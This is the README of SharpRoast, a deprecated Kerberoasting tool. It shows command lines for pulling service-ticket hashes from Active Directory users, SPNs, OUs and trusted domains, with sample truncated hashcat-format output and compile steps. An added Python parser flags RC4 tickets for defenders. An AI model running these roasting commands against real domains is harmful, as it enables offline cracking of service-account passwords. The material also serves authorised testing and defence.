SharpRoast
This project has now been deprecated. Its functionality has been incorporated into Rubeus via the "kerberoast" action, which provides proper ASN.1 structure parsing.
SharpRoast is a C# port of various pieces of PowerView's Kerberoasting functionality. The KerberosRequestorSecurityToken.GetRequest() method was contributed to PowerView by @machosec. The hashes are output in hashcat format.
@harmj0y is the primary author of this port.
SharpRoast is licensed under the BSD 3-Clause license.
Usage
Roast all users in the current domain:
C:\Temp>SharpRoast.exe all
SamAccountName : harmj0y
DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName : asdf/asdfasdf
Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...
SamAccountName : sqlservice
DistinguishedName : CN=SQL,CN=Users,DC=testlab,DC=local
ServicePrincipalName : MSSQLSvc/SQL.testlab.local
Hash : $krb5tgs$23$*$testlab.local$MSSQLSvc/SQL.testlab.local*$9994D1...
...
Roast a specific SPN:
C:\Temp>SharpRoast.exe "asdf/asdfasdf"
Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...
Roast a specific user in the current domain:
C:\Temp>SharpRoast.exe harmj0y
SamAccountName : harmj0y
DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName : asdf/asdfasdf
Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...
Roast users from a specified OU in the current domain:
C:\Temp>SharpRoast.exe "OU=TestingOU,DC=testlab,DC=local"
SamAccountName : testuser2
DistinguishedName : CN=testuser2,OU=TestingOU,DC=testlab,DC=local
ServicePrincipalName : service/host
Hash : $krb5tgs$23$*$testlab.local$service/host*$08A6462...
Roast a specific SPN in another (trusted) domain:
C:\Temp\>SharpRoast.exe "MSSQLSvc/[email protected]"
Hash : $krb5tgs$23$*user$DOMAIN$MSSQLSvc/[email protected]*$9994D148...
Roast all users in another (trusted) domain:
C:\Temp>SharpRoast.exe "LDAP://DC=dev,DC=testlab,DC=local"
SamAccountName : jason
DistinguishedName : CN=jason,CN=Users,DC=dev,DC=testlab,DC=local
ServicePrincipalName : test/test
Hash : $krb5tgs$23$*$dev.testlab.local$test/test*$9129566...
Any of these commands also accepts [domain.com\user] [password] arguments to roast with explicit credentials. For example:
C:\Temp>SharpRoast.exe harmj0y "testlab.local\dfm" "Password123!"
SamAccountName : harmj0y
DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName : asdf/asdfasdf
Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...
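When this output lands in an assessment report, the field after `$krb5tgs$` is the Kerberos encryption type of the issued ticket (23 is RC4-HMAC), which tells the defender which service accounts to prioritise for password rotation or AES-only configuration. The following is an added example, not part of SharpRoast: the function names and the sample text are assumptions, and the hash bodies in the sample are constructed placeholders.

```python
import re

# Constructed sample in the layout shown under Usage; hash bodies are placeholders.
SAMPLE = """\
SamAccountName : sqlservice
DistinguishedName : CN=SQL,CN=Users,DC=testlab,DC=local
ServicePrincipalName : MSSQLSvc/SQL.testlab.local
Hash : $krb5tgs$23$*$testlab.local$MSSQLSvc/SQL.testlab.local*$AAAA...
SamAccountName : testuser2
DistinguishedName : CN=testuser2,OU=TestingOU,DC=testlab,DC=local
ServicePrincipalName : service/host
Hash : $krb5tgs$23$*$testlab.local$service/host*$BBBB...
Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$CCCC...
"""

# Kerberos encryption type numbers (RFC 3962 / RFC 4757).
ETYPES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}
# Layout seen on this page: $krb5tgs$<etype>$*<user>$<realm>$<spn>*$<ticket data>
HASH_RE = re.compile(r"^\$krb5tgs\$(\d+)\$\*([^$]*)\$([^$]*)\$(.+?)\*\$")

def parse_roast_output(text):
    """Return one dict per Hash line, carrying the account fields printed above it."""
    findings, current = [], {}
    for line in text.splitlines():
        key, sep, value = line.partition(" : ")
        if not sep:
            continue  # prompts, "..." and blank lines carry no field
        key, value = key.strip(), value.strip()
        if key == "SamAccountName":
            current = {}  # a new account record starts here
        if key != "Hash":
            current[key] = value
            continue
        m = HASH_RE.match(value)
        if not m:
            continue  # not in the layout this page shows
        etype, _user, realm, spn = m.groups()
        findings.append({
            "account": current.get("SamAccountName"),
            "dn": current.get("DistinguishedName"),
            "realm": realm, "spn": spn,
            "etype": int(etype), "etype_name": ETYPES.get(int(etype), "unknown"),
        })
        current = {}  # SPN-only runs print a bare Hash line with no account fields
    return findings

def rc4_exposed(findings):
    """Findings whose ticket was issued with RC4 (etype 23): review these first."""
    return [f for f in findings if f["etype"] == 23]
```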
Compile Instructions
We are not planning on releasing binaries for SharpRoast, so you will have to compile yourself :)
SharpRoast has been built against .NET 3.5 and is compatible with Visual Studio 2015 Community Edition. Simply open up the project .sln, choose "release", and build.